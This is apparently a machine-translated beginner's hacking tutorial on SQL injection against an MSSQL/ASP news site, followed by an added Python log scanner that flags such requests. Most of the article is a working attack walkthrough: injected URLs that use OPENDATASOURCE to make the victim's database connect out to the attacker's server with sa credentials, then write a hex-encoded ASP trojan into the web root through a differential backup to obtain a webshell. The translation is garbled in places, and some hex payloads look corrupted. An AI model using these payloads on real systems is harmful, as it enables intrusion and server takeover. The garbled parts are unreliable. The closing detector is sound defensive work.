First, let me say that this article was written for newbie friends.
Injection these days? There are plenty of tools. The era of purely manual injection is gone; instead we have injection tools like NBSI, HDSI, AH D and so on. They are also favourites of many newbies who know nothing at all: a few mouse clicks and the password of a website with an injection vulnerability is displayed. Next we scan for the admin backend, upload a Trojan, and it's done. That is the simple case. If SA permission is available, open 3389 or upload a WEBSHELL directly, and then work further on the intranet. With DB_OWNER permission, consider a differential backup. But what if the WEB site and the database are not on the same server? How can that be solved? In fact it may not be a problem: besides running a DOS command that writes a startup key value into the registry so that the target server runs it on startup, there are limitations, since the user must have been authorized on the Master database to call that stored procedure, and few administrators do that, so the hope is slim. What should we do if this happens? See Figure 1.
DB permission. Check whether the database is in the same place as the WEB site. If it is, consider a differential backup. Unfortunately, no WEB directory is found. See Figure 2.
This is the path read through MSSQL's xp_dirtree stored procedure, with the result written to a temporary table. NBSI did not have this function before, so I had to scan for SA to get the backend information; later NBSI added the treelist function, which lists directories so that the directory structure, software information and so on can be viewed more conveniently. Later still Getwebshell came out, which made this function shine: insert the horse into the database and then back up the database as an ASP file. That works, but if the database is too large, dozens of MB, is the webshell still usable? Xiaolu's differential backup is not bad: it reduces the file size by performing a differential backup. But back to the original point: the database is not in the same place as the WEB site ......
In fact, even if the database and the WEB site are not in the same place, there is still a chance; it doesn't mean there is no chance. Generally, when a server has a system installed, IIS gets installed too, right? List his drive C and check whether there is an Inetpub directory; then you will know whether he has installed IIS. But what if you don't know his IP address either? What should we do? You can ping the WEB server and scan port 1433 across the C segment to see which server is available. However, this method is not good: many hosts now enable a firewall, so even if port 1433 is open you cannot scan it. What to do then? You can use the OPENDATASOURCE function in the injected SQL statement to make the other side's SQL Server establish a connection to your own database. Once the connection is established, you get the IP address of the database server. Let's try it. There are a few prerequisites: first, your machine must have a public IP address, and port 1433 must be reachable from the Internet. Good, the conditions are met; let's get started!
I am working on this site. The database is 100% not in the same place as the WEB site; however, the Inetpub folder shows up on disk C, which indicates that IIS is installed on the database server. But I cannot get its IP address. How can this be solved? Simple: let's use the method mentioned above. First create a database on the current machine. Open Query Analyzer and input:
CREATE DATABASE hack520
GO
USE hack520
GO
CREATE TABLE zhu (name nvarchar(256) NULL)
CREATE TABLE J8 (id int NULL, name nvarchar(256) NULL)
GO

Execute it. See Figure 4.
This creates a database named hack520 and the tables zhu and J8. zhu contains the name field; J8 has two fields, id and name. Okay, now we can start to establish the connection ~~~~~~~ First look at this SQL statement: insert into opendatasource(sqloledb, server=your IP address; uid=SQL user; pwd=SQL password; database=created database name).[database name].dbo.[table name] select ... The statement to execute is now:
http://www.xxx.com/news.asp?id=126 insert%20into%20opendatasource(sqloledb,server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520).hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--
Execute it in IE. At this point the other side connects to the SQL Server on my machine. Don't believe it? Run netstat and look. See Figure 5.
Haha, it has connected. Now the IP address of the database server is known, and the database server has port 80 open as well. What are we waiting for?
Back up a webshell. We know the WEB directory is C:\Inetpub\wwwroot. Good. Start.
http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s -- back up the current database
http://www.xxx.com/news.asp?id=126;drop table [hack520];create table [dbo].[hack520] ([cmd] [image]) -- create a table
http://www.xxx.com/news.asp?id=126;insert into hack520 (cmd) values (0x3c2565786563757450201095717565737428226c2229253e) -- insert the blue-screen Trojan
http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433a5c496e65747075625c777777109f6f745c7a68752e617370 backup database @a to disk=@s with differential, FORMAT -- differential backup again; the WEBSHELL is obtained at http://221.216xxx.xx/zhu.asp
Next we use the blue-screen Trojan client to connect; that is simple and I won't go into it here. Although the WEB server's SHELL was not obtained, at least we did not come away empty-handed: the SHELL of the database server was obtained. That's it for now. Bye bye.
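From the defender's side, every request in this walkthrough leaves a distinctive trace in the web server's access log: URL-encoded T-SQL carrying OPENDATASOURCE, BACKUP DATABASE ... TO DISK ... WITH DIFFERENTIAL, xp_dirtree, or long hex literals in a query-string parameter. The Python below is an added example and not part of the original article: it decodes the query string of IIS-style log lines (repeatedly, so double-encoded payloads are caught too) and flags those patterns. The log lines, client addresses, server address and rule names are constructed for the example and are not taken from the article.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample IIS-style log lines (not from the original article).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2023-01-01 10:00:01 203.0.113.5 GET /news.asp id=126 200
2023-01-01 10:00:02 203.0.113.5 GET /news.asp id=126%20insert%20into%20opendatasource(sqloledb,server=198.51.100.9;uid=sa;pwd=x;database=hack520).hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- 500
2023-01-01 10:00:03 203.0.113.5 GET /news.asp id=126;declare%20@a%20sysname,@s%20varchar(4000)%20select%20@a=db_name(),@s=0x433a5c74657374%20backup%20database%20@a%20to%20disk=@s%20with%20differential,FORMAT-- 500
2023-01-01 10:00:04 203.0.113.5 GET /news.asp id=126;exec%20master..xp_dirtree%20'c:\\' 500
2023-01-01 10:00:05 192.0.2.7 GET /news.asp id=127 200
"""

# Detection rules: (name, regex) applied to the fully decoded, lowercased query.
# The names are labels chosen for this example.
RULES = [
    ("opendatasource_outbound_link", re.compile(r"opendatasource\s*\(")),
    ("backup_database_to_disk", re.compile(r"backup\s+database\b.*\bto\s+disk")),
    ("differential_backup", re.compile(r"with\s+differential")),
    ("xp_dirtree_listing", re.compile(r"\bxp_dirtree\b")),
    ("hex_literal_in_query", re.compile(r"0x[0-9a-f]{8,}")),
]


def decode_query(raw: str) -> str:
    """URL-decode until the text stops changing, then lowercase it.

    Repeating the decode catches payloads that were percent-encoded twice
    to slip past a filter that decodes only once.
    """
    prev, cur = None, raw
    while prev != cur:
        prev, cur = cur, unquote_plus(cur)
    return cur.lower()


def parse_line(line: str):
    """Split one log line into its seven fields; return None for malformed lines."""
    parts = line.split(" ", 6)
    if len(parts) < 7:
        return None
    date, time, client, method, stem, query, status = parts
    return {
        "timestamp": f"{date} {time}",
        "client": client,
        "method": method,
        "stem": stem,
        "query": query,
        "status": status,
    }


def scan_log(text: str):
    """Return one hit per log line whose decoded query matches any rule."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = decode_query(rec["query"])
        matched = [name for name, rx in RULES if rx.search(decoded)]
        if matched:
            hits.append({
                "timestamp": rec["timestamp"],
                "client": rec["client"],
                "stem": rec["stem"],
                "rules": matched,
                "decoded": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["timestamp"], hit["client"], hit["stem"], ", ".join(hit["rules"]))
        print("    ", hit["decoded"])
```

The OPENDATASOURCE rule is the one worth alerting on at high priority: a legitimate web application has no reason to make the database server open an outbound connection to an arbitrary address, and the same event should also show up as an unexpected outbound TCP 1433 connection from the database host, which is the second place to look.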